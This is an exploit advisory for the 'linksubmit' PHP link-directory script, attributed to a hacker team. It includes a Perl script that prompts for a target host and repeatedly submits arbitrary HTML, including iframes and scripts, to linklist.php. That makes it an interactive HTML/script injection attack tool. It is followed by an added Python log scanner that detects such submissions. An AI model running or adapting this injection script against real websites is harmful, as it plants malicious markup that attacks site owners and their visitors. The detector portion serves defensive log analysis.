linksubmit (all versions): HTML tag injection in index.php



Vendor : linksubmit
Version : All versions
www : http://www.phpselect.com
AUTHOR : s3rv3r_hack3r
You can submit HTML tags in $description (linksubmit.php).

Exploit :
#!/usr/bin/perl
#
# Exploit by s3rv3r_hack3r
# Special Thanx : hessamx , f0rk ,sattar.li , stanic, mfox,blood moon and..
######################################################
# ___ ___ __ #
# / | \_____ ____ | | __ ___________________ #
#/ ~ \__ \ _/ ___\| |/ // __ \_ __ \___ / #
#\ Y // __ \\ \___| <\ ___/| | \// / #
# \___|_ /(____ )\___ >__|_ \\___ >__| /_____ \ #
# \/ \/ \/ \/ \/ \/ #
# Iran Hackerz Security Team #
# WebSite: www.hackerz.ir #
######################################################
# Name : linksubmit #
# Site : http://www.phpselect.com/ #
######################################################
#you can use iframe,script and all html tags
#bug in linklist.php !!
#www.victim.com/linklist
use LWP::Simple;


print "-------------------------------------------\n";
print "= Iran hacekerz security team =\n";
print "= By s3rv3r_hack3r - www.hackerz.ir =\n";
print "-------------------------------------------\n\n";


print "Target >http://";
chomp($targ = <STDIN>);
print "your web site name >";
chomp($wwwname= <STDIN>);
print "your web site url >";
chomp($wsurl= <STDIN>);
print "your email >";
chomp($mail= <STDIN>);

$con=get("http://".$targ."/linklist.php") || die "[-]Cannot connect to Host";
while ()
{
print "Html code\$";
chomp($comd=<STDIN>);
$commd=get("http://".$targ."/linklist.php?wsname=".$wwwname."&wsurl=".$wsurl."&email=".$mail."&description=".$comd);
}
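
The script above submits the markup as GET query parameters to linklist.php, so each attempt is recorded in the web server's access log. The following is an added example, not part of the original advisory, that flags such requests; the combined log format and the sample log lines are assumptions constructed for illustration, and checking all four fields rather than only description is a generalization.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Query-string fields the advisory's script sends to linklist.php.
FIELDS = ("wsname", "wsurl", "email", "description")
# Start of an opening or closing HTML tag: <script>, </iframe>, <img ...
TAG_RE = re.compile(r"<\s*/?\s*[a-zA-Z]")
# Request part of a combined-format access log line (assumed log format).
REQ_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def flag_html_submissions(log_lines, script="/linklist.php"):
    """Return (line_no, field, decoded_value) for each request to `script`
    whose submission fields contain HTML markup after URL decoding."""
    hits = []
    for line_no, line in enumerate(log_lines, 1):
        match = REQ_RE.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.lower().endswith(script):
            continue
        # parse_qs percent-decodes values and turns '+' into a space.
        params = parse_qs(url.query, keep_blank_values=True)
        for field in FIELDS:
            for value in params.get(field, []):
                if TAG_RE.search(value):
                    hits.append((line_no, field, value))
    return hits

# Constructed sample log lines (not real traffic); documentation address ranges.
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /linklist.php?wsname=Example'
    '&wsurl=http%3A%2F%2Fexample.org&email=a%40example.org'
    '&description=Free+PHP+scripts HTTP/1.1" 200 512',
    '203.0.113.9 - - [01/Jan/2024:10:01:00 +0000] "GET /linklist.php?wsname=Test'
    '&wsurl=http%3A%2F%2Fexample.net&email=b%40example.net'
    '&description=%3Ciframe+src%3Dhttp%3A%2F%2Fexample.net%2Fx%3E HTTP/1.1" 200 498',
    '203.0.113.9 - - [01/Jan/2024:10:02:00 +0000] '
    '"GET /about.php?description=%3Cb%3E HTTP/1.1" 200 120',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /links/linklist.php'
    '?wsname=%3Cb%3ESite%3C%2Fb%3E&wsurl=http%3A%2F%2Fexample.com'
    '&email=c%40example.com&description=ok HTTP/1.1" 200 500',
]

if __name__ == "__main__":
    for hit in flag_html_submissions(SAMPLE_LOG):
        print(hit)
```

A hit only shows that markup was submitted; whether it is rendered depends on whether the application escapes these fields when it outputs them.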


